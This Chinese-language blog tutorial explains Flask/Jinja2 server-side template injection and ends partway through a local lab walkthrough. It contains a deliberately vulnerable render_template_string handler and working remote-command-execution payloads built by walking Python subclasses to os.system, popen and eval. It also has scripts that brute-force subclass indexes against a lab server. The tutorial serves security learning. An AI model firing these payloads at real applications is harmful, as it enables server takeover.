

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="这是我在先知社区的第一篇的文章,希望能对各位师傅有所帮助.
Falsk ssti">
  <meta name="author" content="Noel">
  <meta name="keywords" content="">
  
  <title>flaskssti - Noel&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"n0el4kls.github.io","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>N0el4kLs's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/web_source/shine.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="flaskssti">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-26 14:38" pubdate>
        2021年10月26日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.5k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      91
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">flaskssti</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：3 个月前
                
              </p>
            
            <div class="markdown-body">
              <p>这是我在先知社区的第一篇的文章,希望能对各位师傅有所帮助.</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10394">Falsk ssti</a></p>
<span id="more"></span>

<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/banner.jpg" srcset="/img/loading.gif" lazyload alt="banner"></p>
<h1 id="SSTI-介绍"><a href="#SSTI-介绍" class="headerlink" title="SSTI 介绍"></a>SSTI 介绍</h1><p>SSTI 全称（Server-Side Template Injection),中文名服务端模板注入.</p>
<p>在介绍模板注入之前,首先得知道什么是模板.</p>
<h3 id="什么是模板以及模板引擎"><a href="#什么是模板以及模板引擎" class="headerlink" title="什么是模板以及模板引擎"></a>什么是模板以及模板引擎</h3><p>用通俗的话解释,模板就是一段话中存在可动态替换的部分.假设存在以下代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;hello<span class="hljs-subst">&#123;username&#125;</span>&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>由于这句代码能够因为不同的 <code>username</code>而显示不同的结果,因此我们可以简单的把这段话理解为一个模板.(当然这个例子不是很恰当)</p>
<p>而模板引擎的作用是为了使用户界面(例如上面的<code>hello+用户名</code>)与业务数据或内容(例如上面的username)生成特定的文档(如你所看到的HTML).</p>
<blockquote>
<p>通俗点讲:拿到数据,塞到模板里,然后让渲染引擎将塞进去的东西生成 html 的文本,最后返回给浏览器.</p>
</blockquote>
<p>采用模板以及模板引擎的好处可以让程序(网站)实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,也使得代码重用变得更加容易.</p>
<p>但是由于渲染的数据是业务数据,且大多数都由用户提供,这就意味着用户对输入可控.如果后端没有对用户的输入进行检测和判断,那么就容易产生代码和数据混淆,从而产生注入.</p>
<h1 id="Flask基础"><a href="#Flask基础" class="headerlink" title="Flask基础"></a>Flask基础</h1><p>本文主要学习和记录Python中Flask SSTI.在详细分析Flask SSTI之前,得先对Flask的基础语法有些了解.</p>
<blockquote>
<p>Flask 是一个用python实现的微型web框架,意味着flask能为您提供了工具、库和技术,使您可以构建web应用程序.</p>
</blockquote>
<p>为了快速了解Flask基础,本人简单编写了一段代码<code>demo.py</code>,以此代码为例简单说明Flask语法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask<br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">hello_world</span>():</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Hello World!&#x27;</span><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run()<br></code></pre></td></tr></table></figure>

<ol>
<li><p>第一行,导入Flask类.用于后面实例化出一个WSGI应用程序.</p>
</li>
<li><p>创建Flask实例,传入的第一个参数为模块或包名.</p>
</li>
<li><p>使用<code>route()</code>装饰器告诉Flask怎样解析我们访问的URL.起路由作用.</p>
</li>
<li><p>下面跟着的函数将在访问对应路由时触发.比如此处我们访问网站根目录,将返回 <code>Hello Wrold</code>到对应页面.</p>
</li>
<li><p><code>app.run()</code>函数让应用在本地启动</p>
</li>
</ol>
<p>运行此<code>.py</code>文件</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831161733055.png" srcset="/img/loading.gif" lazyload alt="image-20210831161733055"></p>
<p>并访问<code>http://127.0.0.1:5000</code>你将看到</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831161850794.png" srcset="/img/loading.gif" lazyload alt="image-20210831161850794"></p>
<p>Flask官网也提供了一篇快速入门的章节,可<a target="_blank" rel="noopener" href="http://docs.jinkan.org/docs/flask/quickstart.html">点击此处</a>前往阅读</p>
<h1 id="模板渲染"><a href="#模板渲染" class="headerlink" title="模板渲染"></a>模板渲染</h1><p>Flask 使用了Jinja2 引擎来对模板进行渲染.</p>
<p>再给出渲染模板示例代码之前,咱们先创建个模板,命名为<code>demo_tmp.html</code>,内容如下:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Welcome to Flask<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><br>  <span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br> <span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br>      <span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span>Hello, &#123;&#123;name&#125;&#125;!<span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span><br>  <span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>{% raw %}<br>其中, <code>{{ }}</code> 内是需要渲染的内容.<br>{% endraw %}</p>
<blockquote>
<p>jinja2模板中使用 {{ }} 语法表示一个变量,它是一种特殊的占位符.当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换,jinja2支持python中所有的Python数据类型比如列表、字段、对象等.</p>
</blockquote>
<p>由于Flask 会在 templates 文件夹里寻找模板,所以需要在<code>demo.py</code>的同级目录下创建一个<code>templates</code>目录,并将<code>demo_tmp.html</code>放入.</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831180055212.png" srcset="/img/loading.gif" lazyload alt="image-20210831180055212"></p>
<p>稍微修改以下<code>demo.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> request<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>,methods=[<span class="hljs-string">&#x27;GET&#x27;</span>]</span></span><br><span class="hljs-params"><span class="hljs-meta"><span class="hljs-keyword">def</span> hello_world(<span class="hljs-params"></span>):</span></span><br><span class="hljs-params"><span class="hljs-meta">    query = request.args.get(<span class="hljs-params"><span class="hljs-string">&#x27;name&#x27;</span></span>) <span class="hljs-comment"># 获取get方法传递的 name的值</span></span></span><br><span class="hljs-params"><span class="hljs-meta">    <span class="hljs-keyword">return</span> render_template(<span class="hljs-params"><span class="hljs-string">&#x27;demo_tmp.html&#x27;</span>, name=query</span>) <span class="hljs-comment"># 将get接收到的name的值传入模板,进行渲染</span></span></span><br><span class="hljs-params"><span class="hljs-meta"></span></span><br><span class="hljs-params"><span class="hljs-meta"><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:</span></span><br><span class="hljs-params"><span class="hljs-meta">    app.run(<span class="hljs-params">debug=<span class="hljs-literal">True</span></span>)  <span class="hljs-comment"># 开启 debug模式,每次修改代码后就不需要手动重启服务器,服务器会在代码修改后自动重新载入</span></span></span><br></code></pre></td></tr></table></figure>

<p>运行并访问<code>http://127.0.0.1:5000/?name=Noel</code>,可以看到结果如下结果</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831180652308.png" srcset="/img/loading.gif" lazyload alt="image-20210831180652308"></p>
<p>页面显示会随着传递给name参数的改变而改变.</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831180919952.png" srcset="/img/loading.gif" lazyload alt="image-20210831180919952"></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831184102838.png" srcset="/img/loading.gif" lazyload alt="image-20210831184102838"></p>
<p>那注入问题有又是怎么产生的呢?</p>
<h1 id="Flask-SSTI"><a href="#Flask-SSTI" class="headerlink" title="Flask SSTI"></a>Flask SSTI</h1><p>这里我先给出一段拥有ssti注入漏洞的flask代码:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.errorhandler(<span class="hljs-params"><span class="hljs-number">404</span></span>) </span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">page_not_found</span>(<span class="hljs-params">e</span>):</span> <br>    template = <span class="hljs-string">&#x27;&#x27;&#x27;&#123;%% extends &quot;layout.html&quot; %%&#125; </span><br><span class="hljs-string">    &#123;%% block body %%&#125; </span><br><span class="hljs-string">    &lt;div class=&quot;center-content error&quot;&gt; </span><br><span class="hljs-string">        &lt;h1&gt;Opps! That page doesn&#x27;t exist.&lt;/h1&gt; </span><br><span class="hljs-string">        &lt;h3&gt;%s&lt;/h3&gt; </span><br><span class="hljs-string">    &lt;/div&gt; </span><br><span class="hljs-string">    &#123;%% endblock %%&#125; </span><br><span class="hljs-string">    &#x27;&#x27;&#x27;</span> % (request.url) <br>    <span class="hljs-keyword">return</span> render_template_string(template), <span class="hljs-number">404</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p> 代码来源于:<a target="_blank" rel="noopener" href="https://blog.nvisium.com/p263">https://blog.nvisium.com/p263</a></p>
</blockquote>
<p>这段代码的逻辑为:当访问不存在的路由时或错误请求导致404时,将 URL 格式化为字符串并将其展示给用户.假设我们传入的url为<code>http://127.0.0.1:5000/&lt;script&gt;alert(1)&lt;/script&gt;</code>,访问,触发弹窗.</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831183648864.png" srcset="/img/loading.gif" lazyload alt="image-20210831183648864"></p>
<p>访问<code>http://127.0.0.1:5000/{{7*7}}</code>,发现 <code>{{7*7}}</code>被解析为 <code>49</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210831183726235.png" srcset="/img/loading.gif" lazyload alt="image-20210831183726235"></p>
<p>大家可以将漏洞代码和上面的<code>demo.py</code>进行对比,思考下为什么漏洞代码能够产生注入.</p>
<h3 id="为什么产生-SSTI"><a href="#为什么产生-SSTI" class="headerlink" title="为什么产生 SSTI"></a>为什么产生 SSTI</h3><p>其实对比两段代码很容易发现,</p>
<p><code>demo.py</code>是使用<code>render_template(&#39;demo_tmp.html&#39;, name=query)</code>,而使用这种方式渲染的优点在于需要渲染的参数是通过<code>name=query</code>写死了的,并未交给用户控制.</p>
<p>而在漏洞代码中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python">template = <span class="hljs-string">&#x27;&#x27;&#x27;&#123;%% extends &quot;layout.html&quot; %%&#125; </span><br><span class="hljs-string">    &#123;%% block body %%&#125; </span><br><span class="hljs-string">    &lt;div class=&quot;center-content error&quot;&gt; </span><br><span class="hljs-string">        &lt;h1&gt;Opps! That page doesn&#x27;t exist.&lt;/h1&gt; </span><br><span class="hljs-string">        &lt;h3&gt;%s&lt;/h3&gt; </span><br><span class="hljs-string">    &lt;/div&gt; </span><br><span class="hljs-string">    &#123;%% endblock %%&#125; </span><br><span class="hljs-string">    &#x27;&#x27;&#x27;</span> % (request.url) <br><span class="hljs-keyword">return</span> render_template_string(template), <span class="hljs-number">404</span><br></code></pre></td></tr></table></figure>

<p>是直接将用户输入的url拼接到template中,再进行的渲染的.</p>
<p>由于url可控,所以整体template可控,如果传入的url中包含<code>{{xxx}}</code>,那么在使用<code>render_template_string(template)</code>进行渲染的时候就会把 <code>{{}}</code>中的内容进行解析.</p>
<h1 id="SSTI漏洞利用"><a href="#SSTI漏洞利用" class="headerlink" title="SSTI漏洞利用"></a>SSTI漏洞利用</h1><p>既然说<code>{{}}</code>内能够解析表达式和代码,那我们试试直接插入 <code>import os;os.system(&#39;&#39;)</code>执行shell</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210902205905654.png" srcset="/img/loading.gif" lazyload alt="image-20210902205905654"></p>
<p>很遗憾这种办法是行不通的.</p>
<p>原因是Jinjia 引擎限制了使用import.</p>
<p>那还有什么方法能够执行代码python吗</p>
<p>这时python的魔法方法和一些内置属性便能发挥作用.</p>
<p>这里我先给出一个 <code>payload</code>,通过 payload 来讲解相关魔法方法、内置属性以及利用过程.</p>
<p><code>{{&quot;&quot;.__class__.__base__.__subclasses__()[118].__init__.__globals__[&#39;system&#39;](&#39;whoami&#39;)}}</code></p>
<h2 id="魔法方法和内置属性"><a href="#魔法方法和内置属性" class="headerlink" title="魔法方法和内置属性"></a>魔法方法和内置属性</h2><p><code>__class__</code>:返回该实例对象的类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__<br><span class="hljs-comment"># &lt;class &#x27;str&#x27;&gt;</span><br></code></pre></td></tr></table></figure>

<p><code>__base__</code>:返回该类的父类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__<br><span class="hljs-comment"># &lt;class &#x27;object&#x27;&gt;</span><br><span class="hljs-comment"># 及 object 是 str 的基类(父类)</span><br></code></pre></td></tr></table></figure>

<p><code>__subclasses__</code>():返回当前类的所有子类,返回结果是个列表</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()<br><span class="hljs-comment">#[&lt;class &#x27;type&#x27;&gt;, &lt;class &#x27;weakref&#x27;&gt;, &lt;class &#x27;weakcallableproxy&#x27;&gt;, &lt;class &#x27;weakproxy&#x27;&gt;, &lt;class &#x27;int&#x27;&gt;, &lt;class &#x27;bytearray&#x27;&gt;, &lt;class &#x27;bytes&#x27;&gt;, &lt;class &#x27;list&#x27;&gt;, &lt;class &#x27;NoneType&#x27;&gt;, &lt;class &#x27;NotImplementedType&#x27;&gt;, ...</span><br><br></code></pre></td></tr></table></figure>


<p>很明显,上面这几个内置属性以及魔法方法能够帮助我们得到一些类.那我们得到这些类后干什么呢?</p>
<p>由于无法直接使用<code>import</code>导入模块,那我们就间接导入.通过上诉的一些内置属性和方法可以找到很多基类和子类,而有些基类和子类是存在一些引用模块的,只要我们初始化这个类,再利用<code>__globals__</code>调用可利用的函数,就能够达成我们的目的.</p>
<p>比如:我们想要执行系统函数,首先我们得知道python中那个函数能够执行系统函数.当然<code>system</code>能够达做到,所以我们得寻找哪些类能够调用<code>system</code>.本次实例中使用了118索引,索引的具体内容是<code>&lt;class &#39;os._wrap_close&#39;&gt;</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924165507076.png" srcset="/img/loading.gif" lazyload alt="image-20210924165507076"></p>
<p>选择初始化这个类是因为这个类属于<code>os 模块</code>,我们能够调用其中的<code>system</code>方法<img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924170058683.png" srcset="/img/loading.gif" lazyload alt="image-20210924170058683"></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924170154061.png" srcset="/img/loading.gif" lazyload alt="image-20210924170154061"></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924170402024.png" srcset="/img/loading.gif" lazyload alt="image-20210924170402024"></p>
<p>除此之外,FLASK SSTI 常用来构建payload还有:</p>
<blockquote>
<p>由于目前使用python3 版本较多,以下payload均使用python3实现</p>
</blockquote>
<h4 id="builtins"><a href="#builtins" class="headerlink" title="__builtins__"></a>__builtins__</h4><p>python在启动时就加载<code>__builtins__</code>,里面包含了一些常用方法比如:<code>abs()</code>,<code>max()</code>,<code>eval()</code>等等.详细信息大家可以去<a target="_blank" rel="noopener" href="https://docs.python.org/3/library/builtins.html">官网</a>了解.</p>
<p>那怎样去查找哪些类中拥有<code>__builtins__</code>呢:<br>这个贴出个脚本<code>find_exp_class.py</code>,方便用来查找</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">exp_flask = <span class="hljs-string">&#x27;__builtins__&#x27;</span><br>number = <span class="hljs-number">0</span> <br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-string">&quot;&quot;</span>.__class__.__base__.__subclasses__():<br>	<span class="hljs-keyword">try</span>:<br>		<span class="hljs-keyword">if</span> <span class="hljs-string">&quot;__import__()&quot;</span> <span class="hljs-keyword">in</span> i.__init__.__globals__.keys():<br>			<span class="hljs-built_in">print</span>(number,<span class="hljs-string">&quot;--&gt;&gt;&quot;</span>,i)<br>	<span class="hljs-keyword">except</span> :<br>		<span class="hljs-keyword">pass</span><br>	<span class="hljs-keyword">finally</span>:<br>		number += <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p>在我本地(python3.6)运行,效果如下<br><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924172705770.png" srcset="/img/loading.gif" lazyload alt="image-20210924172705770"></p>
<p>构建payload,可以看到能够执行系统命令</p>
<p><code>().__class__.__base__.__subclasses__()[64].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&quot;__import__(&#39;os&#39;).system(&#39;whoami&#39;)&quot;)</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924173036642.png" srcset="/img/loading.gif" lazyload alt="image-20210924173036642"></p>
<h4 id="sys"><a href="#sys" class="headerlink" title="sys"></a>sys</h4><p>同样,更改<code>find_exp_class.py</code>中<code>exp_flask</code>的内容为<code>sys</code>,本地运行,得到相关类和索引如下:</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924173220905.png" srcset="/img/loading.gif" lazyload alt="image-20210924173220905"></p>
<p>构建payload,可以看到能够执行系统命令</p>
<p><code>().__class__.__base__.__subclasses__()[64].__init__.__globals__[&#39;sys&#39;].modules[&quot;os&quot;].popen(&quot;whoami&quot;).read()</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924173714196.png" srcset="/img/loading.gif" lazyload alt="image-20210924173714196"><br>其实这个payload的本质也是使用<code>os</code>模块</p>
<h4 id="import"><a href="#import" class="headerlink" title="__import__"></a>__import__</h4><p>同样,更改<code>find_exp_class.py</code>中的<code>exp_flask</code>的内容为<code>__import__</code>,本地运行,得到相关类和索引如下:</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924183512163.png" srcset="/img/loading.gif" lazyload alt="image-20210924183512163"></p>
<p>构建payload,可以看到能够执行系统命令:</p>
<p><code>().__class__.__base__.__subclasses__()[64].__init__.__globals__[&#39;__import__&#39;](&#39;os&#39;).system(&#39;whoami&#39;)</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924183400807.png" srcset="/img/loading.gif" lazyload alt="image-20210924183400807"><br>同样,这个payload的本质也是使用<code>os</code>模块中的方法</p>
<p>有大佬把python目前自带函数全部搜集了起来并筛选出了可利用部分,详细可以参考这篇<a target="_blank" rel="noopener" href="https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI/#python3">博客</a></p>
<h1 id="练习"><a href="#练习" class="headerlink" title="练习"></a>练习</h1><p>光说不练假把式.</p>
<p>在了解 <strong>SSTI原理</strong> 以及payload构造基础之后,来通过靶场练练手.学习一下常见trick</p>
<blockquote>
<p>靶场来源于 Github:<a target="_blank" rel="noopener" href="https://github.com/X3NNY/sstilabs">https://github.com/X3NNY/sstilabs</a></p>
</blockquote>
<h2 id="Level-1-no-waf"><a href="#Level-1-no-waf" class="headerlink" title="Level  1 no waf"></a>Level  1 no waf</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924190038637.png" srcset="/img/loading.gif" lazyload alt="image-20210924190038637"></p>
<p>第一关没waf</p>
<p>初步尝试 ,由于不好整理索引,写个脚本</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210924193657572.png" srcset="/img/loading.gif" lazyload alt="image-20210924193657572"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://192.168.0.108:5001/level/1&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">300</span>):<br>	data = &#123;<span class="hljs-string">&quot;code&quot;</span>: <span class="hljs-string">&#x27;&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()[&#x27;</span>+ <span class="hljs-built_in">str</span>(i) +<span class="hljs-string">&#x27;]&#125;&#125;&#x27;</span>&#125; <br>	<span class="hljs-keyword">try</span>:<br>		response = requests.post(url,data=data)<br>		<span class="hljs-comment">#print(data)</span><br>		<span class="hljs-comment">#print(response.text)</span><br>		<span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:<br>			<span class="hljs-keyword">if</span> <span class="hljs-string">&quot;_wrap_close&quot;</span> <span class="hljs-keyword">in</span> response.text:<br>				<span class="hljs-built_in">print</span>(i,<span class="hljs-string">&quot;-----&gt;&quot;</span>,response.text)<br>				<span class="hljs-keyword">break</span><br>	<span class="hljs-keyword">except</span> :<br>		<span class="hljs-keyword">pass</span><br><span class="hljs-comment"># 结果为  132 -----&gt; Hello &amp;lt;class &amp;#39;os._wrap_close&amp;#39;&amp;gt;</span><br></code></pre></td></tr></table></figure>

<p>得到索引后,构造payload,拿到flag</p>
